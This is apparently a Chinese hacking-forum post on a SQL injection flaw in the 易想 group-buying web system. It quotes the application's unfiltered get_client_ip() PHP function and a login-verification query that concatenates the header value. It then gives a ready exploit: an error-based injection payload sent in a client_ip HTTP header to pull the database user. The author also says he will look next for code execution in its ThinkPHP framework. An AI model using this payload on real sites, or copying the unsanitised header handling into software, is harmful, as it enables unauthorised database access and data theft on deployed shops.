剛打開紅黑看到基友寫的一個{易想團購系統 最新版 通殺}的文章,看他貼的代碼裏面有個get_client_ip()函數,哈哈,我猜沒過濾,果斷下了一套程序。
找到get_client_ip()函數:
// 獲取客戶端IP地址
function get_client_ip(){
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}
果然沒過濾,看了下很多地方用到這個函數。
比如:
if($_REQUEST['act'] == 'verify')
{
$id = intval($_REQUEST['id']);
$user_info = $GLOBALS['db']->getRow("select * from ".DB_PREFIX."user where id = ".$id);
if(!$user_info)
{
showErr($GLOBALS['lang']['NO_THIS_USER']);
}
$verify = $_REQUEST['code'];
if($user_info['verify'] == $verify)
{
//成功
$_SESSION['user_info'] = $user_info;
$GLOBALS['db']->query("update ".DB_PREFIX."user set login_ip = '".get_client_ip()."',login_time= ".get_gmtime().",verify = '',is_effect = 1 where id =".$user_info['id']);
$GLOBALS['db']->query("update ".DB_PREFIX."mail_list set is_effect = 1 where mail_address ='".$user_info['email']."'");
$GLOBALS['db']->query("update ".DB_PREFIX."mobile_list set is_effect = 1 where mobile ='".$user_info['mobile']."'");
showSuccess($GLOBALS['lang']['VERIFY_SUCCESS'],0,APP_ROOT."/");
}
團購系統嘛,其實不用看代碼,登陸的這些地方必定會用這個函數。
果斷的,登陸的時候在http頭裏面加了個client_ip,值爲127′
看圖:
報錯注入,很簡單吧,
exp:
火狐插件增加client_ip頭部,對應值爲
‘ and (select * from (select count(*),concat(floor(rand(0)*2),(select user()))a from information_schema.tables group by a)b)#
這套程序用的thinkphp的框架,回頭看看有沒有代碼執行。